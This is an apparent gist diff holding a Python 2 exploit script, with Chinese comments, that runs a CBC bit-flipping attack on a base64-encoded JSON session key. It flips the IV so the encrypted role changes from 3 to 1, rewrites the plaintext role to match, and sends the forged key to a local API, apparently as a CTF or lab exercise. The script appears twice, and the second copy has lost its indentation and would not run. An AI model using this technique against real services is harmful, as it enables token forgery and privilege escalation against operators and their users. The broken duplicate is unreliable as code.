venlentine · July 20, 2019 06:34
diff --git a/gistfile1.txt b/gistfile1.txt
 #!/usr/bin/python2.7
 # -*- coding:utf8 -*-

 import requests
 import base64
 import json

 host = "127.0.0.1"
 port = 8233

 # CBC 翻转攻击将明文里的 role 变为其他数字，比如 1 试试。在第一个区块，所以挺好操作的。
 # 同时注意我们密文里修改了，明文里的 user_role 也得修改。脚本如下

 def cbc_attack(key, block, origin_content, target_content):
    user_key_decode = base64.b64decode(key)
    user_key_json_decode = json.loads(user_key_decode)

    signed_key = user_key_json_decode['signed_key']
    cipher_o = base64.b64decode(signed_key)

    if block > 0:
        iv_prefix = cipher_o[:block * 16]
    else:
        iv_prefix = ''

    iv = cipher_o[block * 16:16 + block * 16]

    cipher = cipher_o[16 + block * 16:]

    iv_array = bytearray(iv)
    for i in range(0, 16):
        iv_array[i] = iv_array[i] ^ ord(origin_content[i]) ^ ord(target_content[i])

    iv = bytes(iv_array)

    user_key_json_decode['signed_key'] = base64.b64encode(iv_prefix + iv + cipher)

    return base64.b64encode(json.dumps(user_key_json_decode))

 def get_user_info(key):
    r = requests.post("http://" + host + ":" + str(port) + "/frontend/api/v1/user/info", headers = {"Key": key})
    if r.json()['code'] == 100:
        print("获取成功！")
    return r.json()['data']

 def modify_role_palin(key, role):
    user_key_decode = base64.b64decode(user_key)
    user_key_json_decode = json.loads(user_key_decode)
    user_key_json_decode['role'] = role
    return base64.b64encode(json.dumps(user_key_json_decode))

 print("翻转 Key:")
 user_key = cbc_attack("eyJzaWduZWRfa2V5IjoiU1VONGExTnBibWRFWVc1alpWSmhVRm1zclQ3a2FGM1FXL29vWDdVcVRpZ215TVl5MFFZK1RlSzMya3hGZW94ay9ZNnkzaG0vaEJXK2lMaXVLdnNNS1NPK1ZQQ0pGSTdPbHJTL0dsYThWWmh1Y3p2NSs4djNXckNJSE5TbVJOS2xBRjREdlI2bDBSbFVaajB6WjgzWGlBPT0iLCJyb2xlIjozLCJ1c2VyX2lkIjoxLCJwYXlsb2FkIjoid2x1NUUwN1piR3pUNDVRUEhORzVReUpQT2UyNjUwalgiLCJleHBpcmVfaW4iOjE1NTY4NTM2Mzh9", 0, '{"role":3,"user_', '{"role":1,"user_')
 user_key = modify_role_palin(user_key, 1)
 print(user_key)
 print("测试拉取用户信息：")
 user_info = get_user_info(user_key)
 print(user_info)
	#!/usr/bin/python2.7
	# -- coding:utf8 --

	import requests
	import base64
	import json

	host = "127.0.0.1"
	port = 8233

	# CBC 翻转攻击将明文里的 role 变为其他数字，比如 1 试试。在第一个区块，所以挺好操作的。
	# 同时注意我们密文里修改了，明文里的 user_role 也得修改。脚本如下

	def cbc_attack(key, block, origin_content, target_content):
	user_key_decode = base64.b64decode(key)
	user_key_json_decode = json.loads(user_key_decode)

	signed_key = user_key_json_decode['signed_key']
	cipher_o = base64.b64decode(signed_key)

	if block > 0:
	iv_prefix = cipher_o[:block * 16]
	else:
	iv_prefix = ''

	iv = cipher_o[block * 16:16 + block * 16]

	cipher = cipher_o[16 + block * 16:]

	iv_array = bytearray(iv)
	for i in range(0, 16):
	iv_array[i] = iv_array[i] ^ ord(origin_content[i]) ^ ord(target_content[i])

	iv = bytes(iv_array)

	user_key_json_decode['signed_key'] = base64.b64encode(iv_prefix + iv + cipher)

	return base64.b64encode(json.dumps(user_key_json_decode))

	def get_user_info(key):
	r = requests.post("http://" + host + ":" + str(port) + "/frontend/api/v1/user/info", headers = {"Key": key})
	if r.json()['code'] == 100:
	print("获取成功！")
	return r.json()['data']

	def modify_role_palin(key, role):
	user_key_decode = base64.b64decode(user_key)
	user_key_json_decode = json.loads(user_key_decode)
	user_key_json_decode['role'] = role
	return base64.b64encode(json.dumps(user_key_json_decode))

	print("翻转 Key:")
	user_key = cbc_attack("eyJzaWduZWRfa2V5IjoiU1VONGExTnBibWRFWVc1alpWSmhVRm1zclQ3a2FGM1FXL29vWDdVcVRpZ215TVl5MFFZK1RlSzMya3hGZW94ay9ZNnkzaG0vaEJXK2lMaXVLdnNNS1NPK1ZQQ0pGSTdPbHJTL0dsYThWWmh1Y3p2NSs4djNXckNJSE5TbVJOS2xBRjREdlI2bDBSbFVaajB6WjgzWGlBPT0iLCJyb2xlIjozLCJ1c2VyX2lkIjoxLCJwYXlsb2FkIjoid2x1NUUwN1piR3pUNDVRUEhORzVReUpQT2UyNjUwalgiLCJleHBpcmVfaW4iOjE1NTY4NTM2Mzh9", 0, '{"role":3,"user_', '{"role":1,"user_')
	user_key = modify_role_palin(user_key, 1)
	print(user_key)
	print("测试拉取用户信息：")
	user_info = get_user_info(user_key)
	print(user_info)